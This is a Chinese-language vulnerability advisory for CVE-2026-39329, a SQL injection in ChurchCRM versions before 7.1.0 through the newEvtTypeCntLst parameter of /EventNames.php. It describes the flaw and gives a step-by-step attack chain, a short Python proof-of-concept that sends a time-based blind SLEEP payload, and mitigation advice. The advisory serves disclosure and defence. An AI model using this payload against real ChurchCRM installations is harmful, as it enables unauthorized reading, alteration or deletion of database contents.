IPBUF安全漏洞报告
English
CVE-2026-39329 CVSS 8.8 高危

CVE-2026-39329 ChurchCRM SQL注入漏洞

披露日期: 2026-04-07
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-39329
漏洞类型
SQL注入
CVSS评分
8.8 高危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
ChurchCRM

相关标签

SQL注入ChurchCRMCVE-2026-39329Web安全高危漏洞

漏洞概述

ChurchCRM是一个开源的教会管理系统。在7.1.0版本之前,其/EventNames.php接口存在SQL注入漏洞。拥有AddEvent权限的认证用户在创建事件类型时,可以通过newEvtTypeCntLst参数注入恶意SQL语句。该漏洞出现在ON DUPLICATE KEY UPDATE子句中,由于未对用户输入进行转义处理,导致攻击者可以直接拼接SQL命令,从而威胁数据库安全。

技术细节

该漏洞源于ChurchCRM在处理事件类型创建请求时的不安全编码实践,影响7.1.0之前的版本。漏洞点位于/EventNames.php文件中的数据库操作逻辑。当具备AddEvent权限的攻击者发送请求创建或更新事件类型时,系统会提取newEvtTypeCntLst参数。由于开发人员未对该参数进行严格的输入验证或使用参数化查询,而是直接将其拼接到SQL查询语句的ON DUPLICATE KEY UPDATE子句中。这种拼接方式允许攻击者构造恶意的SQL payload,干扰原本的数据库查询结构。成功利用此漏洞,攻击者可以在数据库上下文中执行任意SQL命令,从而导致敏感数据泄露、数据被篡改或删除,严重威胁系统的机密性、完整性及可用性。

攻击链分析

STEP 1
侦查
识别目标系统为ChurchCRM,并确认其版本低于7.1.0。
STEP 2
获取凭证
注册或获取一个具有AddEvent(添加事件)权限的低权限账户。
STEP 3
构造Payload
针对/EventNames.php的newEvtTypeCntLst参数,构造用于ON DUPLICATE KEY UPDATE子句的SQL注入代码。
STEP 4
发送请求
使用获取的凭证登录,并发送包含恶意Payload的POST请求到目标接口。
STEP 5
执行攻击
后端数据库执行恶意SQL语句,攻击者窃取数据或破坏数据库完整性。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL url = "http://target-churchcrm/EventNames.php" # Attacker credentials with AddEvent privileges session = requests.Session() login_payload = { "User": "attacker", "Password": "password" } # Perform login (pseudo-code) # session.post("http://target-churchcrm/login", data=login_payload) # Malicious payload to inject into 'newEvtTypeCntLst' # Using time-based blind injection technique sql_payload = "Test', (SELECT SLEEP(5)))-- " # Data to be sent in the POST request post_data = { "newEvtTypeCntLst": sql_payload } # Send exploit request response = session.post(url, data=post_data) # Check if the injection caused a delay (Time-based) if response.elapsed.total_seconds() > 5: print("[+] SQL Injection successful!") else: print("[-] Injection failed or patch applied.")

影响范围

ChurchCRM < 7.1.0

防御指南

临时缓解措施
如果无法立即升级,建议暂时撤销非管理员用户的AddEvent权限,或在网络层面限制对/EventNames.php接口的访问,同时加强数据库层面的异常查询监控。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表